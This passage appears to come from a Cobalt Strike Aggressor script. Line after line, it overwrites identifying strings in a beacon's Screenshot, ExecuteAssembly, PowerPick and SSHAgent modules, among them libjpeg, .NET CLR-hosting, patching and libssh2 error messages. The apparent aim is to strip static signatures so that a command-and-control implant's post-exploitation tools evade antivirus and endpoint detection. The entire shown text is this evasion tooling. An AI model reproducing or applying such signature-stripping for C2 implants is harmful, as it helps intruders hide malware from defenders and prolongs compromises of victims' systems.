    $beacon = strrep_pad ( $beacon, "Screenshot", "Insufficient memory (case", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Cannot quantize more than", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "color components", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Cannot quantize to fewer than", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Cannot quantize to more than", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid JPEG file structure: two SOF markers", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid JPEG file structure: missing SOS marker", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Unsupported JPEG process: SOF type 0x", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid JPEG file structure: two SOI markers", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid JPEG file structure: SOS before SOF", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Failed to create temporary file", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Read failed on temporary file", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Seek failed on temporary file", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Write failed on temporary file --- out of disk space?", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Application transferred too few scanlines", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Unsupported marker type 0x", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Virtual array controller messed up", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Image too wide for this implementation", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Read from XMS failed", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Write to XMS failed", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Copyright (C) 2010, Thomas G. Lane, Guido Vollbeding", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "10-Jan-2010", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Caution: quantization tables are too coarse for baseline JPEG", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Adobe APP14 marker: version %d, flags 0x", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", ", transform", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Unknown APP0 marker (not JFIF), length", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Unknown APP14 marker (not Adobe), length", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Define Arithmetic Table 0x", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Define Huffman Table 0x", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Define Quantization Table", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "precision", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Define Restart Interval", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Freed EMS handle", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Obtained EMS handle", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "End Of Image", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "JFIF APP0 marker: version", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "density", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Warning: thumbnail image size does not match data length", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "JFIF extension marker: type 0x", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "thumbnail image", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Miscellaneous marker", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Unexpected marker", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Quantizing to", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Selected ", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "colors for quantization", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "At marker", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", ", recovery action", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid SOS parameters for sequential JPEG", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Smoothing not supported with nonstandard sampling ratios", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Start Of Frame 0x", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "width=", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", ", height=", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "components=", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Component ", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "q=", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Start of Image", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Start Of Scan:", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "components", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "dc=", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "ac=", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Ss=", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Se=", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Ah=", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Al=", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Closed temporary file", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Opened temporary file", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "JFIF extension marker: JPEG-compressed thumbnail image, length", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "JFIF extension marker: palette thumbnail image, length", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "JFIF extension marker: RGB thumbnail image, length", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Unrecognized component IDs", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", ", assuming YCbCr", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Freed XMS handle", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Obtained XMS handle", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Unknown Adobe color transform code", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Corrupt JPEG data: bad arithmetic code", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Inconsistent progression sequence for component", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "coefficient", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Corrupt JPEG data:", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "extraneous bytes before marker 0x", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Corrupt JPEG data: premature end of data segment", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Corrupt JPEG data: bad Huffman code", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Warning: unknown JFIF revision number", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Premature end of JPEG file", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Corrupt JPEG data: found marker 0x", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "instead of RST", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid SOS parameters for sequential JPEG", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Application transferred too many scanlines", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Bogus message code", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "ALIGN_TYPE is wrong, please fix", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "MAX_ALLOC_CHUNK is wrong, please fix", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Bogus buffer control mode", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid component ID", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "in SOS", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid crop request", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "DCT coefficient out of range", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "DCT scaled block size", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "not supported", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Component index", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "mismatching sampling ratio", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Bogus Huffman table definition", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Bogus input colorspace", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Bogus JPEG colorspace", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Bogus marker length", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Wrong JPEG library version: library is", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "caller expects", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Sampling factors too large for interleaved scan", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid memory pool code", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Unsupported JPEG data precision", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid progressive parameters", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid progressive parameters at scan script entry", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Bogus sampling factors", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid scan script at entry", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Improper call to JPEG library in state", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "JPEG parameter struct mismatch: library thinks size is", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", ", caller expects", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Bogus virtual array access", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Buffer passed to JPEG library is too small", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Suspension not allowed here", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "CCIR601 sampling not implemented yet", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Too many color components:", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", ", max", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Unsupported color conversion request", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Bogus DAC index", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Bogus DAC value", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Bogus DHT index", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Bogus DQT index", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Empty JPEG image (DNL not supported)", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Read from EMS failed", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Write to EMS failed", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Didn't expect more than one scan", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Input file read error", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Output file write error --- out of disk space?", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Fractional sampling not implemented yet", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Huffman code size table overflow", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Missing Huffman code table entry", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Maximum supported image dimension is", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", " pixels", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Empty input file", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Premature end of input file", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Cannot transcode due to multiple use of quantization table", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Scan script does not transmit all data", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Invalid color quantization mode change", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Not implemented yet", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Requested feature was omitted at compile time", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Arithmetic table 0x", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "was not defined", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Backing store not supported", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "Huffman table", "");
    $beacon = strrep_pad ( $beacon, "Screenshot", "JPEG datastream contains no image", "");
    
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "ICLRMetaHost::GetRuntime", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "failed w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", ".NET runtime [ver", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "] cannot be loaded", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "[-] No .NET runtime found. :(", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "[-] get_EntryPoint failed.", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "[-] GetParameters failed.", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "[-] Invoke_3 on EntryPoint failed.", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "[-] Failed to create the runtime host", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "[-] CLR failed to start w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "[-] ICorRuntimeHost::GetDefaultDomain failed w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "[-] Failed to get default AppDomain w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "Could not find signature in the", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "Could not fix signature in the", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "function :", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "[-] Patch index", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", " error setting memory protection", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "loading library", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "getting proc address for:", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "error re-setting memory protection", "");
    $beacon = strrep_pad ( $beacon, "ExecuteAssembly", "bad exception", "");
    
    $beacon = strrep_pad ( $beacon, "PowerPick", "Could not find signature in the", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "Could not fix signature in the", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "function:", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "Patch index", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "error setting memory protection", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "error re-setting memory protection", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "loading library", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "getting proc address:", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "Could not find .NET 4.0 API CLRCreateInstance", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "CLRCreateInstance failed w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "ICLRMetaHost::GetRuntime (v4.0.30319) failed w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", ".NET runtime [ver", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "] cannot be loaded", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "ICLRRuntimeInfo::GetInterface failed w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "Could not find API CorBindToRuntime", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "CorBindToRuntime failed w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "Did not understand ver:", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "Failed to invoke IsAlive w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "SafeArrayPutElement failed w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "Failed to invoke InvokePS w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "Failed to create the runtime host", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "CLR failed to start w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "RuntimeClrHost::GetCurrentAppDomainId failed w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "ICorRuntimeHost::GetDefaultDomain failed w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "Failed to get default AppDomain w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "Failed to load the assembly w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "Failed to get the Type interface w/hr 0x", "");
    $beacon = strrep_pad ( $beacon, "PowerPick", "bad allocation", "");
    
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Error allocating space for remote banner", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Received Banner:", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "SSH-2.0-libssh2_1.8.0", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", " bytes at", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for local banner", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Setting local Banner:", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "API timeout expired", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Timed out waiting on socket", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Error waiting on socket", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Bad socket provided", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Failed changing socket's blocking state to non-blocking", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Failed sending banner", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Failed getting banner", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to exchange encryption keys", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to ask for ssh-userauth service", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid response received from server", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Freeing session resource", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Disconnecting: reason=", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "desc=", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", ", lang=", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "too long description", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "OFF", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Setting blocking mode", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate space for channel data", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Failed allocating memory for channel type name", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate temporary space for packet", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block sending channel-open request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send channel-open request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Channel open failure (administratively prohibited)", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Channel open failure (connect failed)", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Channel open failure (unknown channel type)", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Channel open failure (resource shortage)", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Channel open failure", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Requesting direct-tcpip session to from", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for direct-tcpip connection", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block sending global-request packet for forward listen request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Requesting tcpip-forward session for", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for setenv packet", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send global-request packet for forward listen request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for listener queue", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to complete request for forward-listen", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Cancelling tcpip-forward session for", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block sending forward request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block waiting for packet", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Channel not found", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Channel can not be reused", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "starting request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "on channel", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", ", message=", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for channel-process request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block sending channel request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send channel request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Failed waiting for channel success", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to complete request for channel-process-startup", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "transport read", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "channel_read() got", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "of data from", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "would block", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "We've already closed this channel", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "EOF has already been received, data might be ignored", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Failure while draining incoming flow", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send channel data", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block sending EOF", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send EOF on channel", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "_libssh2_transport_read() bailed out!", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send EOF, but closing channel anyway", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block sending close-channel", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send close-channel request, but closing anyway", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "libssh2_channel_wait_closed() invoked when channel is not in EOF state", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate a command buffer for SCP session", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "scp -", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block starting up channel", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block requesting SCP startup", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block sending initial wakeup", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block waiting for SCP response", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Failed reading SCP response", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Failed to get memory", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "got ", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Failed to recv file", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid data in SCP response", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unterminated response from SCP server", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid response from SCP server, too short", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid response from SCP server, malformed mtime.usec", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid response from SCP server, malformed mtime", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid response from SCP server, too short or malformed", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block waiting to send SCP ACK", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid response from SCP server, malformed mode", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid response from SCP server, invalid mode", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid response from SCP server, invalid size", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid response from SCP server", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block sending SCP ACK", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unexpected channel close", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unknown error while getting error string", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block waiting for response from remote", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "SCP failure", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid ACK response from remote", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Sent ", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block sending time data for SCP file", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send core file data for SCP file", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block waiting for response", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid SCP ACK response", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block send core file data for SCP file", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "failed to get memory", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "failed to send file", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for userauth_list", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block requesting userauth list", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send userauth-none request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Failed getting response", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "No error", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Permitted auth methods:", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for userauth-password request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block writing password request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send userauth-password request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Waiting for password response", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Authentication failed (username/password)", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Password expired, and callback failed", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for userauth password change request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block waiting", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send userauth password-change request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Waiting for password response", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Authentication failed (username/password)", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Password expired, and callback failed", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for userauth password change request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Would block waiting", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send userauth password-change request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Password Expired, and no callback specified", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Authentication failed", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid data in public key file", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for public key data", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Missing public key data", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid public key data", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid key data, not base64 encoded", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "No handler for specified private key", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to initialize private key from file", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Out of memory", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid signature for supplied public key, or bad username/public key combination", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid public key, too short", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid public key", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send userauth-publickey request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Waiting for USERAUTH response", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Username/PublicKey combination invalid", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for userauth-publickey signed data", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Callback returned error", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Failed allocating additional space for userauth-publickey packet", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Waiting for publickey USERAUTH response", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to extract public key from private key.", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid data in public and private key.", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for keyboard-interactive authentication", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send keyboard-interactive request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Waiting for keyboard USERAUTH response", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Authentication failed (keyboard-interactive)", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for keyboard-interactive 'name' request field", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for keyboard-interactive 'instruction' request field", "");
